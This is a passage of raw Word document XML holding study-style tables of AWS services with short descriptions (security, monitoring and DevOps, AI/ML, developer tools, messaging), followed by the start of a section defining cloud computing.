          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05917C97"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cryption key management.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="6606DA5E" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033B76E3"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ecrets Manager / Parameter Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B4CA29B"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ore and manage secrets like API keys, DB credentials.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="276DD93F" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FF4329F"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gnito</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4646DBDF"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User authentication and access control for web/mobile apps.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C341A8E" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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35122AD">
          <v:rect id="_x0000_i3428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EB9D2B" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">6. </w:t>
      </w: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Monitoring &amp; DevOp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68"/>
        <w:gridCol w:w="5161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3A8BFF17" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AF93D75" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36B78C3E" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="4BC791F8" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C5E3A8"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oudWatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DBB76C0"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onitor logs, metrics, and set alerts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="32014898" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4237B86D"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oudTrail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EAB0590"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udit AWS API calls and account activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="3884D2CD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="764ABC9E"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dePipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C32EB97"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I/CD pipeline orchestration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="5121B96C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A97DF3C"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deBuild / CodeDeploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F5BD5B2"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uild and deploy automation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="57B1DC6B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15D34113"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oudFormation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64742B66"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nfrastructure as Code (IaC) using YAML/JSON templates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0766D4DB" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D61D215"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lastic Container Registry (ECR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CC547F9"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ntainer image storage and versioning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F008E48" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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AAC2D59">
          <v:rect id="_x0000_i3429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F26E4" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">7. </w:t>
      </w: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AI/ML Servi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39"/>
        <w:gridCol w:w="5492"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="6481B1E0" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1463BE4A" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5187DEF8" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="3B0E7AC3" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E91B9C9"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ageMaker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="179144F0"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End-to-end machine learning platform.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0A5160F6" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="358860EF"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Rekognition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BFB7F59"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mage and video analysis (face, objects, text).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0EDBE0D9" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F0178DC"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prehend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2686724E"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Natural Language Processing (sentiment, entity recognition).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="016A542B" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="244D9563"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ex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F68C56A"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Build conversational interfaces (chatbots).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="0229D442" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="672BB53C"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Translate / Polly / Textract</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12D4A0CF"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anguage translation, speech synthesis, text extraction.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19C09E27" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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A549BC0">
          <v:rect id="_x0000_i3430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FFE2A" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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 xml:space="preserve">8. </w:t>
      </w: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Developer Too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6"/>
        <w:gridCol w:w="5006"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="5AAE2A1F" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02463A06" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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ervice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B2CA476" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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117C28" w:rsidRPr="00CE4B95" w14:paraId="53FD43DD" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6692BD47"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WS CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26743AB7"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ommand-line tool for managing AWS resources.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="06547DDA" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="362156C5"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AWS SDKs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="380A831B"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Language-specific libraries (Java, Python, Node.js, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="30CC5E2A" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726CBBE8"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Cloud9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50719776"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Online IDE integrated with AWS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B4531FF" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95"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AE80E95">
          <v:rect id="_x0000_i3431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="189BDB15" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C28">
      <w:pPr>
        <w:jc w:val="both"/>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 xml:space="preserve">9. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Other Popular Servi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99"/>
        <w:gridCol w:w="4787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="7043D87E" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E306722" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C2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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F1472A" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C28">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="1CCBA42A" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75D5497D"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QS (Simple Queue Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12713A06"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Message queuing for decoupling systems.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="15EB819C" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B65AAA3"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NS (Simple Notification Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164FFEB7"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Pub/Sub for notifications (SMS, email, Lambda, etc.).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00117C28" w:rsidRPr="00CE4B95" w14:paraId="715C3C34" w14:textId="77777777" w:rsidTr="00117C28">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06D7E9F5"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Step Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24371CE5" w14:textId="77777777" w:rsidR="00117C28" w:rsidRPr="00CE4B95" w:rsidRDefault="00117C28" w:rsidP="00117C28">
            <w:pPr>
              <w:jc w:val="both"/>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orkflow orchestration service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CEC3F70" w14:textId="1B1CF4B0" w:rsidR="009B11FE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009B11FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="6D1D60F1">
          <v:rect id="_x0000_i3432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD27A67" w14:textId="5A124029" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00E57C3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="849" w:name="_Toc196308329"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is cloud computing</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="849"/>
    </w:p>
    <w:p w14:paraId="1A744C0C" w14:textId="57DBB78D" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud computing</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the delivery of computing services over the internet (“the cloud”) to offer faster innovation, flexible resources, and economies of scale. It allows users and businesses to access and store data, applications, and services remotely instead of on a local computer or server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A963442" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="00000000" w:rsidP="001050F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F246F6A">
          <v:rect id="_x0000_i3433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5FC840" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48923E41" w14:textId="77777777" w:rsidR="000417BC" w:rsidRPr="001050FE" w:rsidRDefault="000417BC" w:rsidP="001050FE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001050FE">
        <w:rPr>
